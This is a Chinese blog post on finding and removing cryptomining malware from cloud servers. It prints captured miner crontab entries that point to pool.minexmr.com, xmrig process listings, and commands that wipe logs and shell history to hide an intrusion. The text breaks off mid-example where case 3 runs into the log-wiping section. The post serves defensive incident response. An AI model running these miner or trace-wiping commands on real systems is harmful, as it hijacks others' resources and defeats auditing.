设为首页收藏本站
开启辅助访问

挖矿病毒3

 您所在的位置:网站首页 挖矿out of memory 挖矿病毒3

挖矿病毒3

2023-10-24 07:59| 来源: 网络整理| 查看: 265

前言

1月23日,公司邮箱收到说阿里云报了挖矿病毒的警告

1、分析

这次思路改进了些,起初有个只是定时任务没被清理,阿里云通过定时任务关键字"pool.minexmr.com:4444"报了蠕虫病毒,但是根据关键字查看,这像挖矿 然后 top 了半天没看到结果,怀疑是top被篡改了???然后进了/usr/bin/核对下 top 的时间,发现没差异呀,但是本着稳妥起见,还是下载 busybox

1 2 3 4 wget https://busybox.net/downloads/binaries/1.30.0-i686/busybox chmod +x busybox cp busybox /usr/bin busybox top 2、按步骤排查

剩余步骤跟挖矿病毒2-分析和排查思路一样,只是所有的命令前面是 busybox command

查到的一些异常样例 案例1: 1 2 > cat oracle 2 * * * * /home/oracle/.dhpcd -o pool.minexmr.com:4444 -t8 --safe -B >/dev/null 2>/dev/null 案例2: 1 2 3 4 5 6 7 > cat admin *3 * * * * /var/tmp/.xri/monitor > ps -auxf | grep admin root 746 0.0 0.0 112712 960 pts/0 S+ 15:56 0:00 \_ grep --color=auto admin admin 5846 0.0 0.0 113320 1520 ? S 2021 10:28 /bin/bash /dev/shm/.x/scp admin 739 0.0 0.0 107956 356 ? S 15:56 0:00 \_ sleep 10 案例3: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 > busybox top top - 10:20:08 up 144 days, 9:05, 2 users, load average: 12.07, 12.04, 12.00 Tasks: 295 total, 1 running, 171 sleeping, 1 stopped, 0 zombie %Cpu(s): 50.2 us, 0.1 sy, 0.0 ni, 49.7 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st KiB Mem : 47886084 total, 35389780 free, 4350740 used, 8145564 buff/cache KiB Swap: 969964 total, 969964 free, 0 used. 42956764 avail Mem PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 1505 root 15 -5 4970560 1.156g 10548 S 1200 2.5 40033,13 xmrig > ps -axuf | grep 1505 root 32603 0.0 0.0 14428 1008 pts/2 S+ 10:21 0:00 \_ grep --color=auto 1505 root 1505 1155 2.5 4970560 1212316 pts/1 S/var/spool/mail/root last日志 echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron history日志 echo > /root/.bash_history history -c 查看机器创建以来登陆过的用户 /var/log/wtmp 查看机器当前登录的全部用户 /var/run/utmp 登录信息 /var/log/secure 3.4 前置脚本布置环境

有部分病毒前置脚本加工成二进制,有部分直接 curl 从远程获取并无痕执行 很难提取到前置脚本

3.5 挖矿本体程序都是二进制或加壳

通过 top 、 ps -axuf 或 lsof -i 找到异常进程并跟踪到挖矿本体目录后,发现这些挖矿程序本体都是 ELF 的二进制,有的甚至加壳 ELF用ida pro 分析下,汇编晦涩难懂,只能提取是否还有价值的信息 加壳更加不擅长砸壳,只能点到位置,把病毒本体和守护进程、定时任务这些清理干净还原

3.6 部份挖矿病毒还会感染

部分挖矿病毒还会通过 .ssh/know_hosts 文件进行感染,需要注意排查

3.7 部分挖矿病毒会伪装成系统进程

部分挖矿病毒还会伪装成系统进程,比如kerberdos,直接安装到/user/sbin 目录下

3.9 部分挖矿病毒会篡改top grep等系统命令

部分挖矿病毒还会篡改top、grep等系统基础命令,达到过滤病毒本体的目录,这点通过 busybox 即可解决

3.10 部分挖矿病毒感染途径是开源软件的漏洞

比如jekins、redis、apache、文件上传漏洞

3.11 部分挖矿病毒比较克制,不占满cpu

部分病毒为了达到细水长流的目的,不会跑满所有cpu核心,会伪装成系统进程并只占用一些程序常规的占用率,达到细水长流的目的

3.12 部分挖矿病毒是针对容器化的

比如针对docker,不过目前为止,发现的几期都是针对ECS的

4、防护建议 4.1 注意账号密码保管

不要设置过于简单的密码

4.2 使用堡垒机

目前有一例怀疑是外包开发监守自盗,自己安装了开源挖矿程序,并且本地编译然后启动的

4.3 控制端口

按白名单规则开放,只开放需要的端口,其他端口禁止

4.4 云服务器的云盾产品尽量安装

云盾产品能够多方位检测入侵和病毒,比如通过病毒本体的 hash 值、异常进程、异常cpu 占用率等因素提醒你服务器异常并排查

4.5 不要图方便直接开公网地址和端口

尽量通过堡垒机跳转或者 VPN 跳转,一般应用都是通过 nginx 或者 slb 提供80 443访问的,不会直连服务器,自己方便了,没加固做好防护就是给这些病毒可乘之机

4.6 第三方开源工具需要关注,定期升级

关注第三方开源工具是否存在0day 漏洞等,第三方开源工具的 CVE 带来的危害也很大

4.7 做好网络规划隔离

规划好网络,测试、生产、办公环境等做好虚拟隔离

5、挖矿病毒的参考

挖矿进程——pool.minexmr.com的解决办法1: https://blog.csdn.net/dot_life/article/details/105480202 挖矿进程——pool.minexmr.com的解决办法2: https://blog.csdn.net/qq_16845639/article/details/77650271 kerberods挖矿病毒查杀及分析: https://blog.csdn.net/u010457406/article/details/89328869



【本文地址】


今日新闻

推荐新闻

CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3